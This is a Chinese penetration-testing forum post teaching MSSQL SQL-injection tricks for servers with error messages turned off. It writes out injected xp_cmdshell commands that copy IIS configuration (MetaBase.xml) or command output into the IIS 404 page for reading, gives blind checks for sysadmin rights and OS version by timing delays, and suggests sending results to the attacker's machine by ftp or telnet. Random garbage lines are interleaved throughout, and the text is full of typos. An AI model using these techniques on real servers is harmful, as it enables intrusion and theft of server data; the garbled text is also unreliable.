中国网络渗透测试联盟
标题:
28度的冰注入技巧之(一)——404页面的妙用
[打印本页]
作者:
admin
时间:
2012-9-15 14:15
标题:
28度的冰注入技巧之(一)——404页面的妙用
遇到一个sa注入点,mssql错误提示关闭无疑shi让人郁闷的事情。
/ p' \. Q4 W. F
( J, |; C7 w, g4 Z/ i
虽然错误提示关闭也shi可能以列目录,执行命令,但shishi多少就有些不方便。阿D就可能以在错误提示关闭的情况下列目录。
) ?4 v& d) e( `7 S5 o
, W# U. j2 X4 [# W) ]& |7 }2 V
这里有一个很好的方法,让你得到web目录路径,让你得到服务器上的文件,让你执行命令得到回显。
s. K3 X) c1 @7 n. H' {3 q
+ Y3 H- F9 M* M2 V" f
IIS,404页面的默认路径shi C:\Windows\Help\iisHelp\common\404b.htm
, Q. g- J% `8 h- v/ ^
: X0 P9 g! _5 U# ?$ B5 ~
得到web路径exec master..xp_cmdshell ’copy C:\Windows\system32\inetsrv\MetaBase.xml C:\Windows\Help\iisHelp\common\404b.htm’--
) Y3 X1 A4 X: |" Y( h7 Y( `4 G1 I4 ?- y
- M! a) N$ Z% ]/ U1 O
,这shi20003,如果是2000的话,exec master..xp_cmdshell ’copy C:\Winnt\system32 \inetsrv\MetaBase.xml C:\Winnts\Help\iisHelp\common\404b.htm’--,在 MetaBase.xml存着IIS的很多信息。执行上面的语句之后,你再访问一下网站一个不存在的文件或目录,显示的就shiMetaBase.xml 的内容了。
5 c( Z- ]3 S: I0 i! F
; X6 Y7 E. u5 G6 l; F+ J% F% \' ~/ Q2 g
执行命令得到回显
9 Y$ p) N' H1 W) D
2 S* [* p0 b8 L; R5 {9 ?
通过上面得到web路径的方法,你肯定很容易想到怎么得到回显了吧。 2003,exec master..xp_cmdshell ’ver >C:\Windows\Help\iisHelp\common \404b.htm’--如果是2000,exec master..xp_cmdshell ’ver >C:\Winnt\Help \iisHelp\common\404b.htm’--
2 b6 Z: c7 N9 ?/ z6 D
n# `" D3 v# C/ h4 D/ _9 `
得到文件也shi相同,把文件copy到404b.htm就行了
' C5 t0 Z& |, Q7 Y3 K- Z
+ |+ z) e0 X# g% I J
by 28ice, 2008/6/26
6 L1 m$ l1 A: k: u
( ^ _, k4 n$ N4 n: B5 F3 `" h$ G
摘自 28度的冰
* ^( g4 j+ y0 Y% e0 W
, ?/ b' u7 [/ F4 o1 _
盲注判断权限和操作系统版本
! }% ~, I. s6 |5 Q \6 J1 `" ~
7 r/ i9 d/ x* w3 e
首先第一个问题,如果错误提示关闭,怎么判断当前的权限shi否为sysadmin呢?
o% @/ }$ F* ?& w# f& \$ r
; J3 T# _: y$ `3 J
最简单的,可能以用这样的方法:
, ^" Z. i) J# u
) z% L' C T% Q% m
1=(select IS_SRVROLEMEMBER(’sysadmin’))
7 h% r E8 ~9 \& J
( |" L, q* W3 K4 _5 V% i
当然,有些情况下,这个方法并不奏效。
. y# {8 J1 `; X4 ~- _
6 \ I1 M, W5 y+ y
既然shisa,我们就可能以通过执行命令判断,不过,既然错误提示关闭,那么执行的结果就很不容易拿到。
4 X3 D+ ]; U$ P1 W
: Y; W* R3 o6 A) D/ O$ ~6 G# N' m
有个3办法可能以解决这个问题
; s6 R$ ]9 }) K5 |
9 A. @. S. A2 T, @) d( ]; }
a.把执行结果写到404b.htm,具体请看我的上一篇文章
! m, D7 C; j5 J6 s! Y# I
- g% V3 }! H) U6 Y) O3 q1 E
b.执行ping 127.1 -n 10,看看页面shi否延迟10秒钟
, F& x! K( { Z' T
4 }# B9 t- \2 A" v4 l: U* h
c.如果1433端口可能以连接,那干脆新建个sql登录
+ E9 D( m) r7 L8 G* C
$ `( W* p5 W( M0 T& Y8 S: J0 @
d.如果大牛你shi公网Ip,openrowset,或者直接telnet,ftp到你自己的机子,说到这里,ftp还有别的用处,比如,把执行结果写到文件中,然后通过ftp传到你的机子上,这何尝不shi获得执行结果的一个好办法。当然,你可能能要用到ftp的-s参数
5 {& \6 F; u0 P' ]
/ @0 n5 i7 p, N8 _: P- m; L# K" f' h
还有一个问题,怎么判断系统shi2000还shi2003?当然指的shi错误提示关闭的情况下
4 O' j* P6 ^8 S9 F+ a( S6 s
# S: C: l& u) F+ _1 k$ r
很简单
0 {% n4 E: m& c, `$ z
+ z7 V( Z7 _& _) B
执行systeminfo
# e+ D' r& l6 V1 A0 l- v
0 o6 p* c; E: C" J
在xp/2003下才有这个命令,这个命令执行大概需要5秒钟时间。如果页面延迟5秒,就可能以进一步断定这shi2003(当然不排除2008的可能能性)。
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2